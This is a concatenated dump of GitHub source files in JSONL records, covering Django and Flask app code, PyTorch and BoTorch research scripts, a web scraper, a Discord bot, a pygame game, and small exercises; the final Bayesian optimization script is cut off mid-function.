\"Operating System :: OS Independent\",\n ],\n install_requires=REQUIREMENTS,\n include_package_data=True,\n python_requires='>=3.6',\n)\n","repo_name":"pablo-pinargote/djangocms_svgimage","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34531711611","text":"\nimport torch as T\nfrom torch.autograd import Variable\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--unlabeled\",\n help=\"use unlabeled data\",\n action=\"store_true\")\nparser.add_argument(\"--modelname\",\n help=\"model name\",\n type=str)\nparser.add_argument(\"--loadmodel\",\n help=\"file to load model from for continuation\",\n type=str)\nparser.add_argument(\"--lambdas\",\n help=\"file to load lambdas from\",\n type=str)\nparser.add_argument(\"--cuda\",\n help=\"use cuda\",\n action=\"store_true\")\nparser.add_argument(\"--ensemble\",\n help=\"number of models\",\n type=int)\nparser.add_argument(\"--gamma\",\n help=\"gamma model\",\n action=\"store_true\")\n\nargs = parser.parse_args()\n\ndef variable(*args_, **kwargs):\n if args.cuda:\n return Variable(*args_, **kwargs).cuda()\n else:\n return Variable(*args_, **kwargs)\n\ndef var_to_numpy(v):\n if args.cuda:\n return v.cpu().data.numpy()\n else:\n return v.data.numpy()\n\ndef alloc_list(n):\n return [None] * n\n\ndef anynan(t):\n return ((t != t).sum() > 0) or ((t.abs() > 1e+7).sum() > 0)\n\ndef noise(size, scale=0.3, center=0):\n return variable(T.randn(*size)) * scale + center\n\ndef noised(x, scale=0.3, center=0):\n return x + variable(T.randn(*x.size())) * scale + center\n\ndef batchnorm_mean_var(x):\n ndim = x.dim()\n batch_size = x.size()[0]\n\n if ndim == 4:\n # Torch does not have mean/sum/variance over multiple axes...\n mean = x.mean(0).mean(2).mean(3)\n diff = x - mean.expand_as(x)\n var = (diff ** 2).mean(0).mean(2).mean(3)\n else:\n mean = x.mean(0)\n var = x.var(0) * (batch_size - 1) / batch_size\n\n return mean, var\n","repo_name":"raslann/Deep_learning","sub_path":"hw1/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18173738220","text":"from .db import db, environment, SCHEMA, add_prefix_for_prod\n\nclass List(db.Model):\n __tablename__ = 'lists'\n\n if environment == \"production\":\n __table_args__ = {'schema': SCHEMA}\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(255), nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey(add_prefix_for_prod('users.id')))\n\n tasks = db.relationship(\n \"Task\",\n back_populates=\"list\",\n cascade=\"all, delete-orphan\"\n )\n user = db.relationship(\n \"User\",\n back_populates=\"lists\"\n )\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'user_id': self.user_id\n }\n","repo_name":"sarahmoore19/RememberThatFlask","sub_path":"app/models/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"18051547478","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import include, url\nfrom . import views\n\nurlpatterns = [\n\t# url(r'^$', views.main_page),\n url(r'^$', views.album_list),\n url(r'^album/(?P[0-9]+)/$', views.album_detail),\n url(r'^stats/', views.stats),\n]","repo_name":"artekw/winyle-app","sub_path":"vinyl/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27433710650","text":"from bs4 import BeautifulSoup\nimport requests\nfrom fake_headers import Headers\nimport re\nimport json\n\n\ndef readPageToHtml(url):\n fakeHeaders = Headers(browser='chrome', os='win')\n return requests.get(url, headers=fakeHeaders.generate()).text\n\ndef searchIn(html, searchTag, searchFeatures:dict, findAll = False):\n soup = BeautifulSoup(html, 'lxml')\n if findAll:\n return soup.findAll(searchTag, searchFeatures)\n else:\n return soup.find(searchTag, searchFeatures)\n \ndef descriptionContains(url, regex) -> bool:\n descPageHtml = readPageToHtml(url)\n desc = searchIn(descPageHtml, 'div', {'data-qa':'vacancy-description'})\n return re.search(regex, str(desc)) != None\n \ndef toDict(vacancyInfo) -> dict:\n title = searchIn(str(vacancyInfo), 'a', {'data-qa':'serp-item__title'}).text\n link = searchIn(str(vacancyInfo), 'a', {'data-qa':'serp-item__title'})['href']\n try:\n salary = searchIn(str(vacancyInfo), 'span', {'data-qa':'vacancy-serp__vacancy-compensation'}).text\n except:\n salary = 'з/п не указана'\n employer = searchIn(str(vacancyInfo), 'a', {'data-qa':'vacancy-serp__vacancy-employer'}).text\n city = searchIn(str(vacancyInfo), 'div', {'data-qa':'vacancy-serp__vacancy-address'}).text\n\n return {'title':str(title), 'link':str(link), 'salary':str(salary), 'employer':str(employer), 'city':str(city)}\n\ndef writeToJson(data:list|dict):\n with open('vacancies.json', 'w', encoding='utf8') as file:\n json.dump(data, file, indent=4, ensure_ascii=False)","repo_name":"PVLKorobov/HW-Scrapping","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40145900142","text":"import pprint\nimport threading\nimport time\n\nimport etw\n\n\ndef thread_func(trace):\n trace.start()\n print(\"ThreadEND\")\n\n\ndef prov_callback(event_name: str, event_id: int, provider_name: str, properties: dict) -> None:\n print(event_name, event_id, provider_name)\n pprint.pprint(properties)\n return None\n\n\ndef main():\n print(\"pyETW\")\n print(dir(etw))\n trace = etw.UserTrace(\"PyTrace\")\n\n usb_prov = etw.Provider(\"{ac52ad17-cc01-4f85-8df5-4dce4333c99b}\", callback=prov_callback)\n\n trace.enable(usb_prov)\n\n t = threading.Thread(target=thread_func, args=(trace,))\n t.start()\n\n try:\n print(\"Sleep 30 sec\")\n time.sleep(30)\n except:\n print(\"Interrupted!\")\n finally:\n print(\"Stop Trace\")\n trace.stop()\n print(\"Join Thread\")\n t.join()\n print(\"OK\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jbgalet/pyetw","sub_path":"demo/demo_usb.py","file_name":"demo_usb.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31096812951","text":"import math\nimport sys\n\nn = int(input())\nlength = n\nm = 0\ntemp = 1\n\nwhile(n>=0):\n n-=2\n length-=1\n m+=1\n temp+=(math.comb(length,m)*(2**m)) \n\nprint(temp%10007)","repo_name":"ssum21/BEAKJOON","sub_path":"11727.py","file_name":"11727.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43151835260","text":"import pygame\nimport pygame.mixer\nimport pygame.font\nfrom pygame.locals import *\nimport math\nimport itertools\nimport sys\nimport thread\nimport random\nfrom time import sleep\n\npygame.init()\n\nfullscreen = False\n\nspeed = 0.15\ninterval = 400.0\n\nbord_graphic = pygame.image.load('bord.png')\npipe_graphic = pygame.image.load('pipes.png')\npipe_graphic.set_colorkey((255,0,255))\n\nscreen = pygame.display.set_mode((1280,720), fullscreen)\nclock = pygame.time.Clock()\n\nclass Bord(object):\n\t\n\tdef __init__(self):\n\t\tself.y = 200\n\t\tself.vy = -1.0\n\t\n\tdef flap(self):\n\t\tself.vy = -4.0\n\t\n\tdef pump(self, dt):\n\t\tself.vy += 0.01 * dt\n\t\tself.y += self.vy\n\nclass Obstacles(object):\n\n\tdef __init__(self):\n\t\tself.x = 0\n\t\tself.pipes = [360]\n\t\tself.since_pipe = 0\n\t\n\tdef pump(self, dt):\n\t\tself.x += speed * dt\n\t\tself.since_pipe += speed * dt\n\t\t\n\t\tif self.since_pipe >= interval:\n\t\t\t\n\t\t\tself.pipes.append(random.randint(100,600))\n\t\t\tself.since_pipe -= interval\n\t\t\nclass Engine(object):\n\tdef __init__(self):\n\t\tself.dt = 0\n\t\tself.t1 = pygame.time.get_ticks()\n\t\tself.t2 = 0\n\t\t\n\tdef MainLoop(self):\n\t\t\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT: exit()\n\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\t\texit()\n\t\t\t\telse:\n\t\t\t\t\tbord.flap()\n\t\t\n\t\tself.t2 = pygame.time.get_ticks()\n\t\tself.dt = self.t2 - self.t1\n\t\tself.t1 = self.t2\n\t\t\n\t\tbord.pump(self.dt)\n\t\tobstacles.pump(self.dt)\n\t\t\n\t\tself.DrawGraphics()\n\t\t\n\t\tclock.tick(120)\n\t\t\n\t\tpygame.display.update()\n\n\tdef DrawGraphics(self):\n\t\t\n\t\tscreen.fill((0,0,0))\n\t\t\n\t\tbord_rendered = pygame.transform.rotozoom(bord_graphic, -bord.vy*20, 1)\n\t\tscreen.blit(bord_rendered, (interval - (bord_rendered.get_width() / 2) , bord.y - (bord_rendered.get_height() / 2)))\n\t\t\n\t\tif len(obstacles.pipes) <= 4:\n\t\t\tfor p in range( 0, len(obstacles.pipes) - 1 ):\n\t\t\t\tscreen.blit(pipe_graphic, (1280 + interval - obstacles.x + interval*p, obstacles.pipes[p] - 720) )\n\t\telse:\n\t\t\tfor p in range( len(obstacles.pipes) - 5 , len(obstacles.pipes) - 1 ):\n\t\t\t\tscreen.blit(pipe_graphic, (1280 + interval - obstacles.x + interval*p , obstacles.pipes[p] - 720) )\n\t\t\t\n\ndt = 0\nt1 = pygame.time.get_ticks()\nt2 = 0\n\nobstacles = Obstacles()\nbord = Bord()\nengine = Engine()\n\nwhile 1:\n\tengine.MainLoop()","repo_name":"Nitwon/floppy_bord","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20885868672","text":"\"\"\"\nDjango settings for tripnsale project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'ug0dk251ba6te45^%0qjyna$47kh^6o@!0_5%*@7zel4^6uhv2'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n)\n\nALLOWED_HOSTS = [\"tripnsale.com\", \"127.0.0.1\"]\n\nCURRENT_HOST = \"tripnsale.com\"\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'bootstrap3',\n 'offer',\n 'user',\n 'util',\n 'place',\n 'gallery',\n 'guarant',\n 'infos',\n 'valute',\n 'mail',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'tripnsale.urls'\n\nWSGI_APPLICATION = 'tripnsale.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'tripnsale.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'ru-ru'\n\nTIME_ZONE = 'Europe/Moscow'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = False\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n \"static\",\n)\n\n\nSTATIC_ROOT = \"/var/www/tripnsale/static/\"\n\nTEMPLATE_DIRS = (\n \"templates\",\n)\n\n\nMEDIA_ROOT = \"/var/www/tripnsale/upl/\"\n\nMEDIA_URL = \"/upl/\"\n\nEMAIL_SENDER_MAIL = \"admin@tripnsale.com\"\nEMAIL_SENDER_NAME = \"Trip & Sale\"\n\nENABLE_ACTIVATION = True\n\nEMAIL_DKIM_DOMAIN = None\nEMAIL_DKIM_SELECTOR = \"info\"\n\nENABLE_EMAIL = True\n\n# Use this structure in priv_settings (!!!!!) to make a pair with keys\n# DO NOT WRITE THE KEYS TO THE MAIN settings.py!\nclass _EmailKeys:\n def __init__(self, priv, pub, fromFiles=False):\n if fromFiles:\n with open(priv, 'r') as f:\n self.private = priv.read()\n with open(pub, 'r') as f:\n self.public = pub.read()\n else:\n self.private = priv\n self.public = pub\nEMAIL_DKIM_KEYS = None\n\nif os.path.isfile(os.path.join(BASE_DIR, \"tripnsale\", \"priv_settings.py\")):\n from tripnsale.priv_settings import *\n","repo_name":"boomeer/tripnsale","sub_path":"tripnsale/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27554212070","text":"#Ejercicio 3\n#Se quiere realizar un programa que lea por teclado las 5 notas obtenidas\n#por un alumno (comprendidas entre 0 y 10).\n#A continuación debe mostrar todas las notas, la nota media,\n#la nota más alta que ha sacado y la menor.\n\ndef notas():\n notas=[]\n for i in range (5):\n x = int(input(\"Ingrese calificacion: \"))\n if x > 10 :\n print(\"ERROR, Ingrese nota valida. de 1 al 10\")\n x = int(input(\"Ingrese calificacion: \"))\n notas.append(x)\n else:\n notas.append(x)\n minimo = min(notas)\n maximo = max (notas)\n suma = sum(notas)\n media = suma / len(notas)\n print(\"Sus notas son: \",notas)\n print(\"Nota maxima obtenida: \", maximo)\n print(\"Nota minima obtenida: \", minimo)\n print(\"Media / Promedio: \", media)\n \ndef main():\n notas()\nmain()","repo_name":"marcelofabiangutierrez88/cursoPython","sub_path":"Listas/Ejercicio3_ListaNotas.py","file_name":"Ejercicio3_ListaNotas.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32881310348","text":"import scrapy as scrapy\n\nfrom ..items import *\n\nclass Museum22(scrapy.Spider):\n name = \"Museum22\"\n allowed_domains = ['hebeimuseum.org.cn']\n start_urls = ['http://www.hebeimuseum.org.cn/']\n\n custom_settings = {\n 'ITEM_PIPELINES': {\n 'mySpider.pipelines.MuseumPipeLine': 300,\n },\n 'DOWNLOADER_MIDDLEWARES': {\n 'mySpider.middlewares.DefaultMiddleware': 0,\n },\n }\n # 需要重写的部分\n def parse(self, response, **kwargs):\n item = MuseumBasicInformationItem()\n item[\"museumID\"] = 22\n item[\"museumName\"] = \"河北博物馆\"\n item[\"address\"] = \"河北省石家庄市东大街4号\"\n item[\"openingTime\"] = response.xpath('//*[@id=\"content\"]/div[1]/div[2]/div[2]/div[2]/p[1]/text()').extract_first()\n item[\"consultationTelephone\"] = \"(0311)966518\"\n item[\"introduction\"] = None\n item[\"publicityVideoLink\"] = None\n item[\"longitude\"] = \"117.1531\"\n item[\"latitude\"] = \"39.1747\"\n print(item)\n yield item\n","repo_name":"CS1803-SE/The-First-Subsystem","sub_path":"mySpider/spiders/Museum22.py","file_name":"Museum22.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2842072369","text":"import discord\r\nfrom discord import app_commands\r\nimport sqlite3\r\nfrom datetime import datetime, timedelta\r\nimport csv\r\n\r\ndef yesterday(frmt='%Y-%m-%d', string=True):\r\n yesterday = datetime.now() - timedelta(1)\r\n if string:\r\n return yesterday.strftime(frmt)\r\n return yesterday\r\n\r\nbalance = sqlite3.connect('SimpleClans.db').cursor().execute(\"SELECT balance From sc_clans WHERE name = 'Wolfsgilde'\").fetchall()\r\nintents = discord.Intents.default()\r\nclient = discord.Client(intents=intents)\r\ntree = app_commands.CommandTree(client)\r\n\r\ncsvpath = \"bank/\"+yesterday() + \".csv\"\r\n#csvpath = \"bank/2023-02-20.csv\"\r\noperation = ['DEPOSIT']\r\nlog = []\r\nout= \"\"\r\n\r\n# Open the CSV file\r\nwith open(csvpath, mode='r') as csv_file:\r\n csv_reader = csv.DictReader(csv_file)\r\n\r\n # Iterate over each row in the CSV file\r\n for row in csv_reader:\r\n\r\n # Check if the value in the 'column_name' column is equal to 'target_value'\r\n if row['Operation'] in operation and row['Clan Name'] == 'Wolfsgilde':\r\n if row['Operation'] == 'DEPOSIT':\r\n log.append(row['Sender']+' hat '+row['Amount']+'€ eingezahlt.')\r\n # print(row['Sender']+' hat '+row['Amount']+'€ eingezahlt.')\r\n #print()\r\n\r\n@tree.command(name = \"finance\", description = \"Shows the financial record of yesterday.\")\r\nasync def first_command(interaction):\r\n if(log):\r\n out = \"\\n\".join(log)\r\n await interaction.response.send_message(yesterday()+\"\\n\"+out)\r\n else:\r\n await interaction.response.send_message(yesterday()+\"\\nEs gabe keine Ein/Auszahlungen.\")\r\n\r\n@tree.command(name = \"balance\", description = \"Shows the balance we had this morning at 0:00.\") \r\nasync def first_command(interaction):\r\n await interaction.response.send_message(\"Der GildenKontostand wurde gestern mit \" + str(balance).translate({ord(i): None for i in '[(,)]'})+\"€ abgeschlossen.\")\r\n\r\n@client.event\r\nasync def on_ready():\r\n await tree.sync()\r\n print(\"Ready!\")\r\n\t\t\r\nclient.run(\"token\")","repo_name":"tzuzn/Wolfsgilde-Finanzbot","sub_path":"discordBot.py","file_name":"discordBot.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5868938377","text":"from typing import Callable\nimport torch\nimport gpytorch\nimport random\nimport numpy as np\nimport pdb, time, argparse, itertools, copy\nimport sys, os\nfrom collections import defaultdict\n\nsys.path.append('../')\n\nfrom botorch.models import SingleTaskGP, KroneckerMultiTaskGP, MultiTaskGP\nfrom botorch.fit import fit_gpytorch_model\nfrom botorch.acquisition.knowledge_gradient import qKnowledgeGradient, qMultiFidelityKnowledgeGradient\nfrom botorch.acquisition.monte_carlo import qExpectedImprovement, qNoisyExpectedImprovement\nfrom botorch.sampling.samplers import SobolQMCNormalSampler, IIDNormalSampler\nfrom botorch.optim import optimize_acqf, optimize_acqf_mixed\nfrom botorch.optim.initializers import gen_one_shot_kg_initial_conditions\nfrom botorch.acquisition.objective import LinearMCObjective, ScalarizedPosteriorTransform\nfrom botorch.acquisition.utils import project_to_target_fidelity\nfrom botorch.acquisition.fixed_feature import FixedFeatureAcquisitionFunction\nfrom botorch.acquisition import PosteriorMean\nfrom botorch.models.cost import AffineFidelityCostModel\nfrom botorch.acquisition.cost_aware import InverseCostWeightedUtility\nfrom botorch.models.kernels.exponential_decay import ExponentialDecayKernel\n\nfrom gpytorch.mlls import ExactMarginalLogLikelihood\nfrom gpytorch.kernels import ScaleKernel, MaternKernel, IndexKernel, ProductKernel\nfrom gpytorch.priors.torch_priors import GammaPrior\n\nfrom .models.kernels import ModifiedIndexKernel, IndicatorKernel\nfrom .utils.plotting import plot_progress, plot_acqf_vals_and_fidelities\nfrom .utils.multi_task_fidelity_utils import get_fidelity_covariance, print_kernel_hyperparams, process_multitask_data, expand_intermediate_fidelities, \\\n get_task_covariance, get_task_fidelity_covariance\n\n# TODO: import a list of kernels that I can call by string\n\ndef BO_trial(\n problem_evaluate: Callable,\n problem_name: str,\n #input_dim: int,\n param_ranges: dict,\n algo: str,\n n_initial_pts: int,\n n_bo_iter: int,\n trial: int,\n restart: bool,\n verbose: bool,\n is_multitask = True,\n kernel_name = 'matern_expdecay_index_product',\n multifidelity_params = None,\n checkpoint_fidelities = None,\n **tkwargs\n ):\n\n # Get script directory\n script_dir = os.path.dirname(os.path.realpath(sys.argv[0]))\n results_folder = script_dir + \"/results/\" + problem_name + \"/\" + algo + \"/\"\n\n print('starting trial {} for {}, saving results to {}'.format(trial, problem_name, results_folder))\n\n X = None\n y = []\n acqf_vals = torch.Tensor().cpu()\n sampled_fidelities = []\n\n num_checkpoints = len(checkpoint_fidelities)\n\n if multifidelity_params is not None:\n cost_model = AffineFidelityCostModel(\n fidelity_weights = multifidelity_params['fidelity_weights'], \n fixed_cost = multifidelity_params['fixed_cost'])\n cost_aware_utility = InverseCostWeightedUtility(cost_model=cost_model)\n fidelity_dim = multifidelity_params['fidelity_dim']\n target_fidelities = multifidelity_params['target_fidelities']\n if not is_multitask:\n def project(X):\n return project_to_target_fidelity(X=X, target_fidelities=target_fidelities)\n else:\n target_fidelities[fidelity_dim+1] = 0 # define the target task fidelity to be 0 (main task)\n def project(X):\n return project_to_target_fidelity(X=X, target_fidelities=target_fidelities)\n else:\n cost_model = AffineFidelityCostModel(fidelity_weights = {-1: 0}, fixed_cost = 1) # uniform cost 1 for all inputs\n cost_aware_utility = None\n project = None\n fidelity_dim = None\n\n if restart:\n # check if there is saved data available\n try: \n # get saved data\n X = torch.tensor(np.load(results_folder + 'X/X_' + str(trial) + '.npy'))\n y = torch.tensor(np.load(results_folder + 'output_at_X/output_at_X_' + str(trial) + '.npy'))\n\n runtimes = list(np.load(results_folder + 'runtimes/runtimes_' + str(trial) + '.npy'))\n log_best_so_far = list(np.load(results_folder + 'log_best_so_far_' + str(trial) + '.npy'))\n cum_costs = list(np.load(results_folder + 'cum_costs_' + str(trial) + '.npy'))\n\n init_batch_id = len(log_best_so_far)\n \n print('load saved data for trial {}, starting from iteration {}'.format(trial, init_batch_id))\n\n except:\n # generate initial data\n X = generate_initial_samples(n_initial_pts, param_ranges, trial)\n y = problem_evaluate(X)\n init_batch_id = 1\n\n np.save(results_folder + 'X/X_' + str(trial) + '.npy', X)\n np.save(results_folder + 'output_at_X/output_at_X_' + str(trial) + '.npy', y)\n\n log_best_so_far = []\n runtimes = []\n cum_costs = [cost_model(X).sum().item()] # evaluate cost of sampling initial X\n\n else:\n # generate initial data\n # X has shape (n_initial_pts) * (design_dim + 1)\n X = generate_initial_samples(n_initial_pts, param_ranges, trial)\n # y has shape (num_trials * num_checkpoints) x num_outputs\n y = problem_evaluate(X)\n # then, incorporate intermediate fidelities into X\n # expanded X has shape (n_initial_pts * num_checkpoints) * (design_dim + 1)\n X = expand_intermediate_fidelities(X, checkpoint_fidelities, last_dim_is_task = False)\n\n init_batch_id = 1\n\n np.save(results_folder + 'X/X_' + str(trial) + '.npy', X)\n np.save(results_folder + 'output_at_X/output_at_X_' + str(trial) + '.npy', y)\n\n log_best_so_far = []\n runtimes = []\n cum_costs = [cost_model(X[num_checkpoints-1 : : num_checkpoints]).sum().item()] # evaluate cost of sampling initial X\n \n print('loaded / generated data for {} BO iteration(s)'.format(init_batch_id))\n print('before BO start, X shape, y shape'.format(X.shape, y.shape))\n\n # if multi-output, process X and y to add task dimension to X\n num_outputs = y.shape[-1]\n if is_multitask:\n param_ranges['task_idx'] = ['int', [0, num_outputs-1]]\n # initial X does not contain the task column, so set add_last_col_X to True\n X, y = process_multitask_data(X, y, num_checkpoints, add_last_col_X = True)\n max_posterior_mean = [y[::num_outputs][(num_checkpoints-1)::num_checkpoints].max().item()]\n else:\n max_posterior_mean = [y.max().item()]\n\n bounds, is_int = get_param_bounds(param_ranges)\n print('bounds', bounds)\n print('is_int', is_int)\n\n weights = torch.cat((torch.tensor([1]), torch.zeros(num_outputs-1)))\n objective = ScalarizedPosteriorTransform(weights)\n\n print('number of outputs: {}; weights for linear objective: {}'.format(num_outputs, weights))\n\n # dictionary for logging data\n out = {}\n\n for iter in range(init_batch_id, n_bo_iter+1):\n \n print('starting BO iteration ', iter)\n\n start_time = time.time()\n\n # this calls fit_GP_model() inside\n new_pt, acqf_val, current_max_posterior_mean = optimize_acqf_and_suggest_new_pt(\n algo, X, y, objective, bounds, param_ranges, trial, is_multitask, kernel_name, is_int, \n cost_aware_utility, project, fidelity_dim, num_outputs, num_checkpoints)\n\n max_posterior_mean.append(current_max_posterior_mean)\n sampled_fidelities.append(new_pt[0][fidelity_dim].item())\n\n new_y = problem_evaluate(new_pt)\n print('evaluation of newly sampled point {}'.format(new_y))\n print('shape of evaluation of newly sampled point {}'.format(new_y.shape))\n print('shape of newly sampled point before checkpoint-fidelity expansion {}'.format(new_pt.shape))\n\n if is_multitask:\n # last dimension of new_pt is the task column\n new_pt = expand_intermediate_fidelities(new_pt, checkpoint_fidelities, last_dim_is_task = True)\n print('shape of newly sampled point after checkpoint-fidelity expansion {}'.format(new_pt.shape))\n\n new_pt, new_y = process_multitask_data(new_pt, new_y, num_checkpoints, add_last_col_X=True)\n print('shape of newly sampled point and evaluation after multi-task expansion {}'.format(new_pt.shape, new_y.shape))\n else:\n new_pt = expand_intermediate_fidelities(new_pt, checkpoint_fidelities, last_dim_is_task = False)\n print('shape of newly sampled point after checkpoint-fidelity expansion {}'.format(new_pt.shape))\n\n acqf_vals = torch.cat((acqf_vals, acqf_val))\n\n if cost_model is not None:\n cum_costs.append(cum_costs[-1] + cost_model(new_pt)[-1].item())\n \n print('cumulative cost', cum_costs)\n\n runtimes.append(time.time() - start_time)\n\n X = torch.cat((X, new_pt), dim = 0)\n y = torch.cat((y, new_y), dim = 0)\n print('shape of X and y after concatenating new data point: ', X.shape, y.shape)\n\n # only log the best value of task 0 at the highest fidelity sampled, not the intermediate ones\n if not is_multitask:\n log_best_so_far = y[::num_checkpoints].cummax(0).values[n_initial_pts-1:]\n else:\n log_best_so_far = y[::num_outputs][(num_checkpoints-1)::num_checkpoints].cummax(0).values[n_initial_pts-1:]\n \n if verbose:\n print('Finished iteration {}, best value so far is {}'.format(iter, log_best_so_far[-1].item()))\n\n # save results in dictionary\n out['X'] = X\n out['Y'] = y\n out['runtimes'] = runtimes\n out['best_so_far'] = log_best_so_far\n out['acqf_vals'] = acqf_vals\n out['cum_costs'] = cum_costs\n\n torch.save(out, results_folder + 'trial_' + str(trial) + '_' + kernel_name) # TODO: make kernel name an input\n\n title = 'best objective value for ' + problem_name + ' with ' + algo\n if is_multitask:\n title += ' (multitask)'\n\n plot_progress([title, log_best_so_far], cum_costs, results_folder, trial, max_posterior_mean = max_posterior_mean)\n plot_acqf_vals_and_fidelities(acqf_vals, sampled_fidelities, results_folder, trial)\n\n\ndef fit_GP_model(X, y, is_multitask, kernel_name, is_int=None, num_outputs = None):\n\n # TODO: What kind of kernel to use is something we want to revisit later [P1]\n\n if not is_multitask:\n # if use_additive_kernel:\n # covar_module = ScaleKernel(MaternKernel(active_dims = torch.arange(0, X.shape[-1]-1))) + \\\n # ScaleKernel(ExponentialDecayKernel(active_dims = torch.tensor([X.shape[-1]-1])))\n # else:\n # covar_module = ProductKernel(ScaleKernel(MaternKernel(active_dims = torch.arange(0, X.shape[-1]-1))), \n # ExponentialDecayKernel(active_dims = torch.tensor([X.shape[-1]-1])) )\n\n # model = SingleTaskGP(X, y, covar_module=covar_module)\n # TODO: deal with the single task case later\n pass\n\n else:\n # change to single task GP with my custom kernel on {inputs} x fidelity x task\n # option 1: matern on inputs, exponentially decaying kernel on fidelity, index kernel on task\n # option 2: MISO kernel on {inputs} x task, exponentially decaying kernel on fidelity\n\n if kernel_name == 'matern_expdecay_index_product':\n covar_module = ProductKernel(\n MaternKernel(active_dims = torch.arange(0, X.shape[-1]-2)),\n ExponentialDecayKernel(\n active_dims = torch.tensor([X.shape[-1]-2]), \n lengthscale_prior=GammaPrior(3.0, 6.0),\n # offset_prior=GammaPrior(3.0, 6.0),\n # power_prior=GammaPrior(3.0, 6.0)\n ),\n ModifiedIndexKernel(\n active_dims = torch.tensor([X.shape[-1]-1]), \n num_tasks=num_outputs,\n # prior=GammaPrior(3.0, 6.0)\n )\n )\n # Note to self: the reason I got rid of the prior is b/c if I apply them then fid kernel params are constantly at 0\n elif kernel_name == 'matern_index_product':\n covar_module = ProductKernel(\n MaternKernel(active_dims = torch.arange(0, X.shape[-1]-1)),\n ModifiedIndexKernel(\n active_dims = torch.tensor([X.shape[-1]-1]), \n num_tasks = num_outputs,\n )\n )\n elif kernel_name == 'matern_index_additive':\n covar_module = ProductKernel(\n MaternKernel(active_dims = torch.arange(0, X.shape[-1]-2)),\n ModifiedIndexKernel(\n active_dims = torch.tensor([X.shape[-1]-1]), \n num_tasks=3,\n # prior=GammaPrior(3.0, 6.0)\n )\n ) + ProductKernel(\n IndicatorKernel(X.shape[-1]-1), \n MaternKernel(active_dims = torch.arange(0, X.shape[-1]-1))\n )\n elif kernel_name == 'matern_expdecay_index_additive':\n covar_module = ScaleKernel(MaternKernel(active_dims = torch.arange(0, X.shape[-1]-2))) + \\\n 